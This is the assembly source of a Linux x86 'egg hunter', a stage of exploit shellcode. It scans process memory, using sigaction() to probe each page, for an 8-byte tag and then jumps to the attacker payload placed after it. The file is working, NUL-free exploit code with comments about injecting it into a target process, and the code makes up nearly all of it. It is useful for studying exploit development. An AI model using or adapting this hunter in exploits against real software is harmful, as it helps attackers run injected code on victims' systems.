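; egg_hunter.asm -- Linux x86 (32-bit) egg hunter, sigaction() flavour.
;
; Scans the process address space byte by byte for an 8-byte "egg"
; (the 4-byte tag EGG repeated twice) and jumps to the byte that follows
; it.  Before a page is read, it is probed with the sigaction() syscall:
; the kernel has to read a struct sigaction from the pointer in ECX, so an
; unmapped page makes the call fail with -EFAULT and the scan can skip the
; page without taking a SIGSEGV.
;
; Syntax: NASM / Intel.  Target: Linux i386, int 0x80 syscall ABI
;   (EAX = nr, EBX/ECX/EDX = args, result in EAX, -errno on error).
; Register roles: ECX = scan pointer, EAX = syscall nr / tag, EDI = scasd
;   pointer, EBX = sigaction signum (deliberately invalid, see below),
;   EDX = sigaction oldact (never written because the call always fails
;   before reaching it -- confirm against the kernel you target).
; Assumes DF = 0 so scasd advances EDI (SysV guarantees DF = 0 at
;   function entry; add a `cld` if that is not guaranteed at the
;   injection point).  Assumes 4 KiB pages (PAGE_OFFS_MASK).
;
; The egg must be laid in the target as the two dwords EGG, EGG
; (byte sequence in memory: "YOBJYOBJ"); the payload starts right after
; them.  The hunter itself contains the tag immediate only once, which is
; why the tag is matched twice: the hunter can never find itself.

bits 32

SYS_SIGACTION   equ 0x43            ; Linux i386 sigaction() syscall number (67)
EFAULT_LOW      equ 0xf2            ; low byte of -EFAULT (-14 = 0xfffffff2)
PAGE_OFFS_MASK  equ 0x0fff          ; low 12 bits = offset inside a 4 KiB page
EGG             equ 0x4a424f59      ; tag; encoded bytes 59 4f 42 4a = "YOBJ"

global _start
section .text

_start:
        xor     ebx, ebx                ; signum = 0: sigaction() can then only
                                        ; return -EINVAL or -EFAULT and never
                                        ; installs a handler.  The original left
                                        ; EBX unset; when injected into a process
                                        ; a valid signum there would let a probe
                                        ; of readable memory modify signal state.
        xor     ecx, ecx                ; scan pointer starts at address 0

.next_page:
        or      cx, PAGE_OFFS_MASK      ; move to the last byte of the current
                                        ; page.  OR, not XOR: the pointer is NOT
                                        ; page-aligned when the probe faults on a
                                        ; struct that straddles the page end, and
                                        ; XOR would then move it backwards and
                                        ; re-scan the same page forever.
.next_addr:
        inc     ecx                     ; next candidate address
        push    byte SYS_SIGACTION      ; `byte` keeps the encoding NUL-free (6a 43)
        pop     eax
        int     0x80                    ; sigaction(ebx, ecx, edx): probe [ecx]
        cmp     al, EFAULT_LOW          ; only the low byte of -errno is checked;
                                        ; any other result (e.g. -EINVAL) means
                                        ; the memory at [ecx] was readable
        jz      .next_page              ; unmapped -> skip the rest of the page

        mov     eax, EGG
        mov     edi, ecx                ; scasd compares [edi] with eax, edi += 4
        scasd
        jnz     .next_addr              ; first tag missing -> keep scanning
        scasd
        jnz     .next_addr              ; second tag missing -> keep scanning
        jmp     edi                     ; egg found: edi now points just past it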